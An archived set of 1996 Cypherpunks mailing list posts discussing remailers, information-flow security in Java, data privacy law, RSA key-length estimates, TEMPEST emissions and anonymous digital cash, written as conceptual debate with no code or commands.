: Usura just answered this on alt.privacy.anon-server. The basement
: mail2news gateway is temporarily blocking posts from c2.org until the
: alt.syntax.tactical forgers go away or can be filtered with new code.

: While I publicly whined that SOMETHING needed to be done about the problem
: (for PR reasons if nothing else), I'm disappointed that there was no
: public announcement of the downtime first. Heck, when Scientology came
: knocking, there was an 11-day window before utopia shut down... 

My fault, I didn't imagine shutting down access for c2.org would 
have a big impact. (other then that the forgeries would stop) Besides 
the block was in effect for about 12 hours and I was mearly testing 
if the code did work. (apperantly it does)

My sincere apologies if mail has been lost due to this situation.

bEST Regards,
--

	-AJ-




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@it.kth.se>
Date: Tue, 28 May 1996 22:39:12 +0800
To: norm@netcom.com (Norman Hardy)
Subject: Re: Runtime info flow in Java
In-Reply-To: <adcc0ddc040210048873@DialupEudora>
Message-ID: <199605281015.MAA21153@piraya.electrum.kth.se>
MIME-Version: 1.0
Content-Type: text/plain



| At 9:09 AM 5/24/96, Lucky Green wrote:
| ....
| >I walked away from your presentation of KeyKOS with the impression that a
| >capability system to be secure it would have to be implemented at the OS
| >level.
| >Can you build a such a system on top of an insecure OS, as Java would have
| >to do?
| [....]
| 
| We do not have a complete map between capabilities and Java. There are
| things about Java that we have not mapped to capabilities yet. For instance
| any piece of code in a Java program that can declare a reference to an
| object of classs Zot is also able to invoke any of the public constructors
| for Zot. This may be too strong an ability.

First of all I'm concentrating on programs that deals with data input 
from many different subjects. There is a problem in trying to separate 
the influence of these different subjects from each other. What resources 
should the process be allowed to access? If it is too little, nothing 
useful can be done. If it is too much, you run a risk of compromise.

I try to achieve my goals in a somewhat different way than in a traditional
capabilities system. Much, if not most, of the security work make the 
assumption that the program can do anything, and that the OS doesn't 
know squat about what the program does from a security point of view. 
This clearly doesn't work anymore, at least in my view.

What I try to achieve is that one doesn't have to trust the program anymore.
The program is compiled with a special compiler that inserts an extra
"guarding" program in parallell with the original program. I call this the
"shadow code", since it shadows the original program's execution.

All data inputs to the process have a subject identity to them. The shadow
code keeps track of how these identities flow through the variables and the
execution path as the program is executed. Suppose we're calculating 
c := a + b, then the subject set of 'c' is the union of the subject sets of
'a' and 'b'; sset[c] := sset[a] U sset[b].  Subject sets appear, instead of
plain subjects, as you can see. This is a piece of shadow code that is
executed just before the original statement is executed. You have to
take care of the execution path as well for conditionals as well.

The subject sets are presented to the OS by the shadow code when the program
does a system call. These subject sets are now used to do *detailed* access
control for the *specific* system call. This (hopefully) solves the problem
of giving too much/too little access, since this decision now can be based
on the precise subject sets presented.

You can find a discussion on this in a power point presentation at
http://www.it.kth.se/~cwe/phd/licpres.ppt. Take a look at 
http://www.it.kth.se/~cwe for more info. Comments are most welcome!

/Christian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Baugh <bruce@aracnet.com>
Date: Wed, 29 May 1996 08:59:33 +0800
To: cypherpunks@toad.com
Subject: Re: Philosophy of information ownership
Message-ID: <2.2.32.19960528193842.00700704@mail.aracnet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:29 AM 5/28/96 -0700, Timothy C. May wrote:

>Contracts are the key.

Agreed. The more that can be explicitly spelled out about these matters, the
better.

A separate problem arises when the government compels the disclosure of
information for one purpose - getting a driver's license, say - and then
turns around and sells it to others. It's much harder to either negotiate a
new contract or go to a competitor when the other party is a government.

--
Bruce Baugh
bruce@aracnet.com
http://www.aracnet.com/~bruce





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Baugh <bruce@aracnet.com>
Date: Wed, 29 May 1996 09:05:04 +0800
To: cypherpunks@toad.com
Subject: Re: Philosophy of information ownership
Message-ID: <2.2.32.19960528193844.0070beac@mail.aracnet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:25 AM 5/28/96 -0700, Sandy Sandfort wrote:

>information about ourselves.  is it reasonable to expect
>these people to no release nor use that information unless 
>we specifically give them permission? 

In many cases, sure it is. I can't see how giving you the information to
establish that I can pay a bill I owe you should be in any sense treated as
a license do anything else with that info. A great many transactions are
finite, and ought not have lingering implications or side deals dangling off
the end.

In the long run, this is where anonymous payments come in. In the meantime,
I muddle on as best I can.

--
Bruce Baugh
bruce@aracnet.com
http://www.aracnet.com/~bruce





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Wed, 29 May 1996 08:15:58 +0800
To: "Mark M." <markm@voicenet.com>
Subject: Re: Layman's explanation for limits on escrowed encryption ...
In-Reply-To: <Pine.LNX.3.93.960527203358.1163A-100000@gak>
Message-ID: <9605281800.AA00525@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Mark M. <markm@voicenet.com> writes:
>  The normal key-length recommendation was 96 bits.  64 bits
>  and 80 bits are equivalent to 512 bits and 768 bits respectively.
>  I would guess that a 1024-bit key is about as strong as an
>  96-bit key.  The first two numbers are from _Applied
>  Cryptography_; my estimate is an extrapolation from the data
>  = in AC.

These number should be qualified with the date on which the estimate was  
determined.  New factoring techniques increase the number of RSA key bits  
required to make factoring work equivalent to a given brute-force search.

Also, I would think that the NFS makes 512 bit RSA key factoring easier than  
brute-forcing 64-bits of key space...


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matts Kallioniemi <matts@pi.se>
Date: Tue, 28 May 1996 23:45:06 +0800
To: cypherpunks@toad.com
Subject: Re: Remailers & liability
Message-ID: <2.2.32.19960528112004.003a64cc@mail.pi.se>
MIME-Version: 1.0
Content-Type: text/plain


At 23:28 1996-05-27 -0700, Greg Broiles wrote:
>If I have some idea who the remailer operator is, and
>they are root, I feel like I learn something if the operator says "My system
>doesn't log traffic." If the operator isn't in a position to know (because
>they're not root) or if I don't have a reason to trust them, I assume the
>remailer is logging traffic. And a remailer that logs traffic may be more
>dangerous than no remailer at all, because the amount of security provided
>is illusory. 

One benefit of non root / anonymous remailers is deniability. When the
police come knocking on root's door, root can say that he didn't know about
the kiddie porn remailer and he will shut it down asap. It will be hard to
prove that he had intent to run a remailer (assuming that remailers are
outlawed, like they are in France?).

A remailer that logs traffic is still useful because it will take the enemy
some time and money to get the log. With plenty of remailers in your chain,
that's plenty of time and money, and hopefully at least one remailer isn't
keeping logs.

Matts





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iang@cs.berkeley.edu (Ian Goldberg)
Date: Wed, 29 May 1996 10:07:57 +0800
To: cypherpunks@toad.com
Subject: Re: Is Chaum's System Traceable or Untraceable?
In-Reply-To: <01I53GAYSQUC8Y4Z90@mbcl.rutgers.edu>
Message-ID: <4ofo56$hbv@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <01I53GAYSQUC8Y4Z90@mbcl.rutgers.edu>,
E. ALLEN SMITH <EALLENSMITH@ocelot.Rutgers.EDU> wrote:
>From:      IN%"iang@cs.berkeley.edu" 23-MAY-1996 13:56:31.71
>
>>Ah.  I see I was misunderstood.  The goal was not to make the shop anonym=
ous,
>>but rather to be able to provide change to an anonymous payer.
>
>      I had thought that the basic purpose of the fully anon system was just
>that - full anonymnity for payer and payee. Under your suggestion, the shop
>gives up this anonymnity under these circumstances in order to be able to =
make
>change. I'm not sure if I would call that a very good tradeoff...
>      -Allen


Yes, that's the _basic_ purpose, but the "anon" protocol has several
useful "secondary" properties as well.  This (providing change to an
anonymous payer) is one of them.

   - Ian

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMatj1kZRiTErSPb1AQH0PQP/U6SvqgUew4oDQjo5U4mRJurDm0Co+3va
YCQ6TvqfkkvQDMu3HtFqolBKa6CAhJXz3RFq1mEV50F/VvafD45Utui6btH4JSCh
1xljSeGO6aF7cFW5NhSe/r8oW1IkwQbb6vkJRZQlt2fYr1qTjYp2+PmJsHXbIqk+
z1aV/VYiJdI=
=r7eJ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iang@cs.berkeley.edu (Ian Goldberg)
Date: Wed, 29 May 1996 10:18:32 +0800
To: cypherpunks@toad.com
Subject: Re: Is Chaum's System Traceable or Untraceable?
In-Reply-To: <01I53GAYSQUC8Y4Z90@mbcl.rutgers.edu>
Message-ID: <4ofocm$hd1@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <Pine.LNX.3.93.960524230954.96A-100000@smoke.suba.com>,
snow  <snow@smoke.suba.com> wrote:
>On Fri, 24 May 1996, E. ALLEN SMITH wrote:
>
>> From:      IN%"iang@cs.berkeley.edu" 23-MAY-1996 13:56:31.71
>> 
>> >Ah.  I see I was misunderstood.  The goal was not to make the shop anonymous,
>> >but rather to be able to provide change to an anonymous payer.
>> 
>>       I had thought that the basic purpose of the fully anon system was just
>> that - full anonymnity for payer and payee. Under your suggestion, the shop
>> gives up this anonymnity under these circumstances in order to be able to make
>> change. I'm not sure if I would call that a very good tradeoff...
>
>      Howzabout this: Figure out about how many coins of each denom. the
>shop should have on hand, and every so often the shop goes online to even
>out it's til. That way the shop maintains the capability to make change
>for anything. 
>      Alternative: Instead of the shop going online every <x> minutes,
>set it up so that everytime the shop goes online it evens out the til so
>that it really isn't know whether the shop went online to make change for
>a specific customer, or just to even out the til.
>
>
But then the shop, having seen the coins before, can collude with the bank
to identify the customer!  The point of this use of the "anon" protocol
is that the shop, throughout the transaction, never sees the coin it
uses to provide change to the customer.

   - Ian

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMatkxUZRiTErSPb1AQEoJQQAqNnLZZybaB45yci7wiHI7fXX/tjEKc2n
riAJ0TV/Ensuzan7KxYYQSyxvtBnZS5LxDM/pq25zh66WHgzVs4ocJPIuBLl/8Qz
ITeIEKTuZ+ZwoyR0oPfO/73wPO4j7fNmShQ0sC/Hx4s2C4zX3I+9buegiSX24ded
883j6nY357o=
=drwL
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 29 May 1996 11:16:04 +0800
To: cypherpunks@toad.com
Subject: Fairness, Justice, and Cypherpunks
Message-ID: <add0a562060210045585@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Several recent messages have raised issues about "ownership of
information," "compilation of dossiers," and the (putative) imbalance
between personal power and corporate power (which some think justifies
denying corporations certain basic rights or Constitutional protections).

I'll try to make my points brief. For those who think this has little to do
with the Cypherpunks list, I disagree. Everyday we see proposed laws which
seek to create a "fairer" society but which actually do not (and cannot,
using the violations of other basic rights such laws so often entail). We
see on this very list calls for "Data Privacy Laws," and Europe's various
data privacy laws are often held up as a model.

A couple of posters have also mentioned the seminal work of John Rawls, and
his "Theory of Justice." I'll use this as a platform for my points, though
it is only one of several viewpoints which say much the same thing.

To cut to the chase: When any law is proposed, think of how one would react
to the law if in the shoes of others. How would one react if one were the
"target" of the law?

(While Rawls posits a situation in which one is to imagine alternate
universes in which one trades places with others, with "just" laws being
those that the maximum number of people would accept in this ensemble of
universes, the situation is not nearly so abstract as one might imagine.
Namely, one can imagine becoming wealthy, or owning a business, or someday
needing to speak controversial thoughts. A wise person thinks about these
possible developments in his life and carefully asks himself if the laws he
is thinking about supporting would be supported by himself should he become
wealthy, own a business, or have controversial things to say. Nietzsche
said the most corrosive human sentiment is _envy_, and I think he was
paralleling the later thoughts of Rawls, Nozick, Rand, and many others. It
is interesting that one of the "British diseases" is intense class envy,
with a desire to pull down those who have succeeded...ironic that Britain
is a pioneer in "data privacy laws.")

Let's take the somewhat off-topic (for the list) case of "minimum wage
laws." It casts a different light on the issue.

Many people talk about the "reasonableness" of insisting that employers
give their employees a "fair" wage. But how can "fairness" ever be defined
except in terms of what an employer is willing to pay and what an employee
is willing to accept? As a prospective employee, I may _wish_ that the
State force employers to pay more than they are normally willing to pay for
a job. But imagining myself as an employer, maybe a job is "worth" only
$3.50 an hour to me, period. It just ain't worth more. In a free market,
people can take it or leave it. It is not right that the government decide
how much I must pay

(There are related issues of job opportunities for young kids, which have
been severely cut as "floor-sweeping" sorts of "starter jobs" (e.g., teens
bagging groceries, day laborers picking up roadside trash, etc.) have been
made uneconomical by minimum wage laws. And when an employer is told to pay
more than a job is worth to him, he may either automate the job or simply
find ways not to do the job. But I'm concentrating on the "justice"-type
issues, not various practical side effects, though these are real.)

As this relates to Rawls, I view all laws in terms of how I would react if
they applied to _me_. This informs all of my analyses of laws. This is why
I often say politically incorrect things about various forms of job
discrimination. For example, I view the laws saying that an employer cannot
discharge an employee unless "adequate reason" is given. (Increasing
numbers of states and locales have increasing numbers of restrictions on
employers.) I imagine myself hiring a  worker to do something, then, for
various reasons, no longer wishing that worker to be at my house (maybe
it's the bone through his nose, maybe it's her Mohawk haircut, maybe it's a
chip on his shoulder, maybe I just don't like him, etc.). I picture the
employee taking his "grievance" to the State, and collecting back wages
plus penalties from me. Arggh! So much for freedom.

(I also like playing the "turn the tables" game in another related way.
Various laws say that employers cannot get rid of employees except under
certain circumstances. Shouldn't such laws apply the other way around? "I'm
sorry Manuel, but I cannot let you leave this job to take that better job.
Under the Fairness in Employment Act, you cannot leave this job unless you
have justified your actions with the State Fairness in Employment Office.")


* Data Privacy Laws *

Closer to the CP themes, let's look at "data privacy laws." I mean the laws
similar to what Europe has, not contractual arrangements made with data
collectors. (That is, we probably all agree that a doctor who sells patient
medical data is wrongly selling this data, as there is either an implied
contract (much as I hate this "implied" construct), a formal code of
medical ethics (which may be what generates the implied contract), or an
actual formal contract stating that the doctor will preserve the
confidentiality of his patient's records.)

Here's the semi-Rawls interpretation:

* To the consumer, or private citizen, or ordinary person, such laws may
initially sound good. It stops "dossiers" from being compiled (or so the
theory goes...the reality, even in Britain, is quite different).

* But what if the citizen imagines himself on the _other end_ of such laws?
(This is, as I said, a mental exercise when considering all proposed laws.)

Will I get a knock on the door and have the Data Privacy Enforcement Office
demand to enter my home to inspect my computer files? Will they demand that
I decrypt the encrypted files to ensure that no violations of the Data
Privacy Act of 1998 have occurred?

(What happened to "secure in one's papers.." and "Congress shall make no
law...free speech"? Or do such rights only apply to individuals and not
groups (companies, clubs, etc.)? Sadly, such appears to be the case, with
raids and random inspections of companies for various reasons. This is a
worrisome development, the notion that if I have a business or company my
rights go out the door. (And some crypto relevance is that such
interpretations of rights could be used to say that whereas any single
individual may have the right to use strong crypto, all groups, clubs,
companies, partnerships, etc. must comply with government rules on crypto.
The "regulate commerce" clause rides again.))

Will it become a crime to "remember" the public utterances of others? (Me:
"But in 1988 you said you were a supporter of Fidel Castro" Him: "How dare
you remember that information!...that information belongs to _me_, and I
insist that you not repeat that illegally-remembered item to anyone,
summarize it in any way, or sell it as part of any transaction without a
formal release from me.")

Supporters of Data Privacy Laws may well say that the laws do not outlaw
mere "rememberances." Well, in fact the U.K. laws _do_ effectively regulate
such collections of utterances or other publically-derivable facts by
mandating that any data bases of names, dossiers (which are of course
collections of facts attached to a name), and mailing lists be subject to
regulations, be reported to the appropriate authorities, and that the
subjects of dossiers be notified that a dossier exists on them.

(As might be imagined, this law is probably not very effective. But like
many bad laws, it automatically makes a large number of people into de
facto criminals. Of course, governments often like this situation...it
increases leverage on those they wish to hassle.)


* Enforcement of Laws *

Another semi-Rawlsian way to look at laws is to imagine what might be
needed to enforce particular laws and then ask if this is something one
wants to see.

We do this a lot on this list with discussions of the outlawing of strong
crypto. We realize that outlawing strong crypto would effectively require a
kind of police state to enforce, with random searches of packets, with
monitoring of communications, and with draconian penalties for the
violators.

"A law which is not enforceable without a police state should not be a law."

Much of what we talk about on the list is oriented toward making such laws
as "Data Privacy Laws" essentially unenforceable. Think of data havens,
keeping "illegal mailing lists" in other countries, bypassing the Fair
Credit Reporting Act by various stratagems, etc.

I'll leave it to those who have read this far to think about this issue in
more detail.


* Last Thought *

Before supporting a law which "sounds fair," ask yourself how the law will
be applied to those on the other side, and how you would feel if the law
were to be applied to you.

While probably very few of us _like_ the thought that various people and
organizations are taking our words and our actions and placing them in data
bases or dossiers, think of the implications overall in banning or
attempting to ban such actions.

(For one thing, the administrative overhead of complying with the laws
would probably make hosting the CP list in the U.K. prohibitively
time-consuming. Mailing lists are covered by the U.K.'s Data Privacy Laws,
and the operators of a list site would have to fill out the appropriate
paperwork, probably pay for a license, report regularly to the members of
the list, etc. And those who _archive_ these lists (the hks archives, my
own archives, your archives, etc.) are ipso facto, slam dunk violations of
the European-style laws. Is this what is wanted? And does it make a
difference?)

We should have very, very few laws. Laws about murder, rape, theft, etc.
And most such laws pass the "Rawls test, of course. (Another formulation of
the Rawls sort of analysis is in terms of "rights as Schelling points,"
after the noted game theorist.)

Cypherpunks should not, in my strong belief, support "data fairness laws"
or "anti-gossip laws."

Put yourself in the shoes of someone affected by these kinds of laws.

--Tim May








Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Wed, 29 May 1996 09:04:59 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Tempest Info
In-Reply-To: <199605280739.AAA07817@toad.com>
Message-ID: <9605281908.AA00554@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Bill Stewart writes:
>  Also, of course, your electrical power system needs to be
>  shielded and filtered, so only 60Hz gets through, unless you
>  plan to stick to laptops and bring in spare battery packs.

At HoHoCon a few years ago, someone did a tempest demo and mentioned that  
signals could be recovered from water pipes!  Fire sprinkler systems were  
specifically mentioned...

Theres a lot of different avenues for your eminations to be recovered, some  
you may not of have thought of.  Like crypto, tempest is economics.


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Wed, 29 May 1996 09:42:48 +0800
To: Bruce Baugh <cypherpunks@toad.com
Subject: Re: Philosophy of information ownership
Message-ID: <2.2.32.19960528211416.0072ecfc@popmail.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                       SANDY SANDFORT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

C'punks,

At 12:38 PM 5/28/96 -0700, Bruce Baugh wrote:

>I can't see how giving you the information to
>establish that I can pay a bill I owe you should be in any sense treated as
>a license do anything else with that info. A great many transactions are
>finite, and ought not have lingering implications or side deals dangling off
>the end.
>
>In the long run, this is where anonymous payments come in. 
>In the meantime, I muddle on as best I can.
                                      ^^^^^
As must we all.  As I said, we are all responsible for our
own privacy.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 29 May 1996 11:17:33 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Runtime info flow in Java
Message-ID: <199605282216.PAA15909@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:31 PM 5/24/96 -0400, E. ALLEN SMITH wrote:
>From:   IN%"frantz@netcom.com" 24-MAY-1996 21:22:44.97
>>We can use certificates (ref: SPKI) to implement network capabilities. 
>>These certificates make statements of the form: The holder of the secret
>>key which corresponds to this public key is permitted these specific forms
>>of access to this specific resource on this location (e.g. a URL).  These
>>certificates can act like capabilities.  They can be passed by creating a
>>new certificate for the receiver which gives it the privileges implied by
>>the old certificate.  They can be rescinded in any of a number of ways.
>
>        I suppose that the new certificate is created through a message
>signed by the old certificate's private key?

Sounds like a good way to me.  When you want to pass a capability, you can
either get a completely new certificate from the resource's system, or
generate a (possibly temporary) transfer certificate that accompanies a
copy of your certificate.

Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 29 May 1996 12:20:41 +0800
To: cypherpunks@toad.com
Subject: Re: Philosophy of information ownership [ Re: Children's	  Privacy Act ]
Message-ID: <199605282216.PAA16023@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:24 AM 5/27/96 -0500, Mike McNally wrote:

>What if I just *see* your couch, and then back in my garage I use my
>couch replicator to make a couch just like yours, complete with fuzzballs
>and loose change between the cushions?  Now I have your couch, in a sense.
>Are you still upset?

If the couch design is copyrighted, you have just violated the copyright :-).


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 29 May 1996 11:54:37 +0800
To: cypherpunks@toad.com
Subject: Re:  Remailer chain length?
Message-ID: <199605282223.PAA14079@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Jim Choate <ravage@ssz.com>
> > From: "Mark M." <markm@voicenet.com>
> > And besides, the more remailers there are, the
> > more difficult it is to do traffic analysis on remailer traffic.  Actually,
> > its the more remailers people chain messages through, but there are software
> > packages that can do this easily.  The more remailers there are, the longer
> > remailer chains have the possibility of becoming.
> 
> If this is strictly true, why not simply run several instances of a remailer
> on the same machine. Then randomly chain them prior to sending them off
> site.

Or better still, run one remailer on the machine, and use it multiple
times in the chain.  It seems to me that one remailer on a machine is
better than several because it will allow more mixing of messages.  If
two messages enter a machine and later leave, it may be possible to
distinguish them if they went to different remailers and left with
different From: addresses (or other header fields) as a result.  If they
had both gone to the same remailer it would be harder to tell them
apart.

I understand that there may be political reasons to have the machine
owner and remailer operator be separate (although AFAIK the reasoning
behind this is untested), but technically it seems better to have one
remailer per machine based on traffic analysis issues.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 29 May 1996 11:30:09 +0800
To: cypherpunks@toad.com
Subject: Re: Philosophy of information ownership
Message-ID: <add0cb140702100430ad@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:38 PM 5/28/96, Bruce Baugh wrote:
>At 12:29 AM 5/28/96 -0700, Timothy C. May wrote:
>
>>Contracts are the key.
>
>Agreed. The more that can be explicitly spelled out about these matters, the
>better.
>
>A separate problem arises when the government compels the disclosure of
>information for one purpose - getting a driver's license, say - and then
>turns around and sells it to others. It's much harder to either negotiate a
>new contract or go to a competitor when the other party is a government.

And I agree, too.

I can support "data privacy laws" when the government is the party affected
by the laws. (Though, being somewhat cynical and having seen many cases
where governments conveniently exempted themselves from laws or simply
ignored them, I am not hopeful that any data privacy laws will have the
intended effect.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Wed, 29 May 1996 11:37:09 +0800
To: cypherpunks@toad.com
Subject: Re: Fairness, Justice, and Cypherpunks
Message-ID: <2.2.32.19960528225501.00747668@popmail.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                       SANDY SANDFORT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

C'punks,

At 01:55 PM 5/28/96 -0700, Timothy C. May wrote a thoughtful
disquisition on privacy laws and concluded:

>Cypherpunks should not, in my strong belief, support "data 
>fairness laws" or "anti-gossip laws."

To which I would add:  Cypherpunks has never been about laws
at all, except in the subversive sense.  It has been the oft
stated goal of Cypherpunks to protect privacy through the 
use of techonology, *irrespective* of what laws say.

Cypherpunks who don't want powerful corporations to invade
their privacy should be working on better privacy technology
instead of trying to dance with the devil.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 29 May 1996 11:40:55 +0800
To: cypherpunks@toad.com
Subject: Re: Philosophy of information ownership
Message-ID: <add0d22d08021004db8d@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:38 PM 5/28/96, Bruce Baugh wrote:

>In many cases, sure it is. I can't see how giving you the information to
>establish that I can pay a bill I owe you should be in any sense treated as
>a license do anything else with that info. A great many transactions are
>finite, and ought not have lingering implications or side deals dangling off
>the end.

Most lenders are interested in these things:

* past history of paying bills, especially for monthly bills such as VISA
(and when one applies for and accepts a VISA card, it is explicitly made
clear that repayment/deliquency information will be reported to credit
agencies...most people of course _want_ this information reported, as this
is largely what "establishing a credit history" is all about).

* lenders for larger items, such as cars and houses, will want collateral
and some evidence that the monthly repayment amounts are achievable (even
if a loan is secured by a car, for example, it makes no sense for them to
lend money to an unemployed 18-year-old and then have to spend money and
time retrieving the car, etc.

* other factors which have historically affected loan repayment
probabilities, such as age, sex, ethnic group, religion, educational
background, etc.

(Note: Some of these criteria are of course no longer legal to officially
use, even if their strong and clear correlations.)

Note that "credit" is not a right. Credit, like insurance, is a kind of
"bet" a lender is making. A bet that he will get his principal back, with
interest. To help him make this bet, people offer evidence of past good
faith in loans, and choose to reveal their current salaries, ownership of
other assets, etc.

In no way is this coerced. Anyone is free to eschew credit, avoid borrowing
money, and pay with cash or checks for all purchases.

>In the long run, this is where anonymous payments come in. In the meantime,
>I muddle on as best I can.

No, anonymous payments have very little to do with credit. See above.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Wed, 29 May 1996 09:13:43 +0800
To: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Subject: Re: Layman's explanation for limits on escrowed encryption ...
In-Reply-To: <9605281800.AA00525@ch1d157nwk>
Message-ID: <Pine.LNX.3.93.960528160536.176B-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 28 May 1996, Andrew Loewenstern wrote:

> Mark M. <markm@voicenet.com> writes:
> >  The normal key-length recommendation was 96 bits.  64 bits
> >  and 80 bits are equivalent to 512 bits and 768 bits respectively.
> >  I would guess that a 1024-bit key is about as strong as an
> >  96-bit key.  The first two numbers are from _Applied
> >  Cryptography_; my estimate is an extrapolation from the data
> >  = in AC.
> 
> These number should be qualified with the date on which the estimate was  
> determined.  New factoring techniques increase the number of RSA key bits  
> required to make factoring work equivalent to a given brute-force search.
> 
> Also, I would think that the NFS makes 512 bit RSA key factoring easier than  
> brute-forcing 64-bits of key space...

Quite true.  These estimates were made in 1995 so they are probably still
pretty accurate.  The rate at which factoring time decreases is greater than
the rate at which brute-force time decreases.  As to your claim that factoring
a 512 bit number is easier than bruting a 64-bit key space, it is not feasible
for anyone except maybe the NSA to do either of these.  I have heard that an
effort similar to that of factoring RSA 127 will be launched against a 512-
bit modulus.  I think that the difficulty is about equal to that of brute-
forcing a 64-bit key.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
((2b) || !(2b))                 | Old key now used only for signatures
"The concept of normalcy is just a conspiracy of the majority" -me


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMatd7bZc+sv5siulAQHZZAP/eyguOKHDmfYtVEr7JVH0jxuTRVWdWDxJ
ICEuHrhKnF0xG3kaBirOMtvZjnga90cFRk++pEv/zbAS0qyEoizA1YxnKUQrqHn5
emuYf+lbm83fzBBOcKwdspoSg8W25TTtJIH2BX7JpNiyVzfco7DcHJOPxlDxspGZ
LgUf7G9L4vI=
=uO8h
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
